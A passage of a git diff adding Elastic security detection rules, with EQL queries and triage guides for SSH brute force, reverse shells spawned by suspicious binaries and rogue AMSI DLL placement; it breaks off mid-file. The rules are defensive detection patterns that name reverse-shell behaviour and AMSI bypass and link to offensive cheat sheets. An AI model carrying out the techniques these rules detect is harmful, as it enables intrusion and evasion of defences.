@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 5, + "name": "Potential External Linux SSH Brute Force Detected", + "note": "## Triage and analysis\n\n### Investigating Potential External Linux SSH Brute Force Detected\n\nThe rule identifies consecutive SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts.\n\nThis rule will generate a lot of noise for systems with a front-facing SSH service, as adversaries scan the internet for remotely accessible SSH services and try to brute force them to gain unauthorized access. 
\n\nIn case this rule generates too much noise and external brute forcing is of not much interest, consider turning this rule off and enabling \"Potential Internal Linux SSH Brute Force Detected\" to detect internal brute force attempts.\n\n#### Possible investigation steps\n\n- Investigate the login failure user name(s).\n- Investigate the source IP address of the failed ssh login attempt(s).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Infrastructure or availability issue.\n\n### Related Rules\n\n- Potential Internal Linux SSH Brute Force Detected - 1c27fa22-7727-4dd3-81c0-de6da5555feb\n- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, source.ip, user.name with maxspan=15s\n [ authentication where host.os.type == \"linux\" and \n event.action in (\"ssh_login\", \"user_login\") and event.outcome == \"failure\" and\n not cidrmatch(source.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \n \"::1\", \"FE80::/10\", \"FF00::/8\") ] with runs = 10\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fa210b61-b627-4e5e-86f4-17e8270656ab", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. 
Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": 
"https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "fa210b61-b627-4e5e-86f4-17e8270656ab_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7.json new file mode 100644 index 00000000000..5b3a580f93d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7.json 
@@ -0,0 +1,126 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Reverse Shell via Suspicious Binary",
+ "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.executable : (\n \"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/var/www/*\", \"/dev/shm/*\", \"/etc/init.d/*\", \"/etc/rc*.d/*\",\n \"/etc/crontab\", \"/etc/cron.*\", \"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\",\n \"/boot/*\", \"/srv/*\", \"/run/*\", \"/root/*\", \"/etc/rc.local\"\n ) and\n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and not\n process.name : (\"curl\", \"wget\", \"ping\", \"apt\", \"dpkg\", \"yum\", \"rpm\", \"dnf\", \"dockerd\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and\n process.executable : (\n \"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/var/www/*\", \"/dev/shm/*\", \"/etc/init.d/*\", \"/etc/rc*.d/*\",\n \"/etc/crontab\", \"/etc/cron.*\", \"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\",\n \"/boot/*\", \"/srv/*\", \"/run/*\", \"/root/*\", \"/etc/rc.local\"\n ) and destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n 
process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n",
+ "references": [
+ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "fa3a59dc-33c3-43bf-80a9-e8437a922c7f",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.004",
+ "name": "Unix Shell",
+ "reference": "https://attack.mitre.org/techniques/T1059/004/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1071",
+ "name": "Application Layer Protocol",
+ "reference": "https://attack.mitre.org/techniques/T1071/"
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 7
+ },
+ "id": "fa3a59dc-33c3-43bf-80a9-e8437a922c7f_7",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_7.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_7.json
new file mode 100644
index 00000000000..c04a164cb47
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_7.json 
@@ -0,0 +1,108 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious Antimalware Scan Interface DLL",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n",
+ "references": [
+ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell"
+ ],
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ },
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "fa488440-04cc-41d7-9279-539387bf2a17",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": 
"https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ },
+ {
+ "id": "T1574",
+ "name": "Hijack Execution Flow",
+ "reference": "https://attack.mitre.org/techniques/T1574/",
+ "subtechnique": [
+ {
+ "id": "T1574.001",
+ "name": "DLL Search Order Hijacking",
+ "reference": "https://attack.mitre.org/techniques/T1574/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 7
+ },
+ "id": "fa488440-04cc-41d7-9279-539387bf2a17_7",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_8.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_8.json
new file mode 100644
index 00000000000..8397cd0cb84
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_8.json
@@ -0,0 +1,109 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.sysmon_operational-*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious Antimalware Scan Interface DLL",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n",
+ "references": [
+ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell"
+ ],
+ "related_integrations": [
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ },
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "fa488440-04cc-41d7-9279-539387bf2a17",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1562",
+ "name": "Impair Defenses",
+ "reference": 
"https://attack.mitre.org/techniques/T1562/",
+ "subtechnique": [
+ {
+ "id": "T1562.001",
+ "name": "Disable or Modify Tools",
+ "reference": "https://attack.mitre.org/techniques/T1562/001/"
+ }
+ ]
+ },
+ {
+ "id": "T1574",
+ "name": "Hijack Execution Flow",
+ "reference": "https://attack.mitre.org/techniques/T1574/",
+ "subtechnique": [
+ {
+ "id": "T1574.001",
+ "name": "DLL Search Order Hijacking",
+ "reference": "https://attack.mitre.org/techniques/T1574/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 8
+ },
+ "id": "fa488440-04cc-41d7-9279-539387bf2a17_8",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_9.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_9.json
new file mode 100644
index 00000000000..a65365315b1
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_9.json
@@ -0,0 +1,109 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.file-*",
+ "logs-windows.sysmon_operational-*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious Antimalware Scan Interface DLL",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
